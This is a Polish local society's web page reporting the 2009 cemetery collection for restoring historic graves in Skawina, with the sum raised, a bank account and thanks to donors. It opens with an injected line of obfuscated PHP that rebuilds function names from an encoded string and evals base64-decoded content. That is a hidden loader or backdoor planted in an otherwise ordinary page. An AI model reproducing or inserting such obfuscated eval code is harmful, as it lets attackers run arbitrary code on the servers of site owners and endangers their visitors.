$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> KWESTA 2009 | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

KWESTA 2009

data dodania: 20 listopada 2012

III Kwesta na renowację zabytkowych grobów

III Kwesta na renowację zabytkowych grobów za nami! Dzięki Państwa hojności zebraliśmy na skawińskich cmentarzach, Parafialnym i Komunalnym, łączną kwotę 8 300 złotych 71 groszy, w tym 1$ USD. Cała kwota została wpłacona do Banku Spółdzielczego w Skawinie dnia 2 listopada 2009 roku na całoroczne, wyodrębnione konto:

TPS ul. Mickiewicza 26, 32-050 Skawina 37 8600 0002 0000 0000 1427 0003.

Na obydwu cmentarzach bezpośrednio kwestowało ok. 100 osób, a dalszych 20 osób przyczyniło się aby przebieg Kwesty był sprawny i miał wymaganą oprawę.

Pozyskana kwota jest nieco wyższa w stosunku do kwoty z ubiegłego roku, co świadczy, iż mino rosnących kosztów utrzymania mieszkańcy ziemi skawińskiej doceniają rangę i potrzebę ratowania zabytkowych grobów, pomników historii „Małych Ojczyzn”.

Wszystkim Darczyńcom serdecznie dziękujemy.

Dziękujemy również Wszystkim, którzy do powodzenia tego przedsięwzięcia TPS się przyczynił.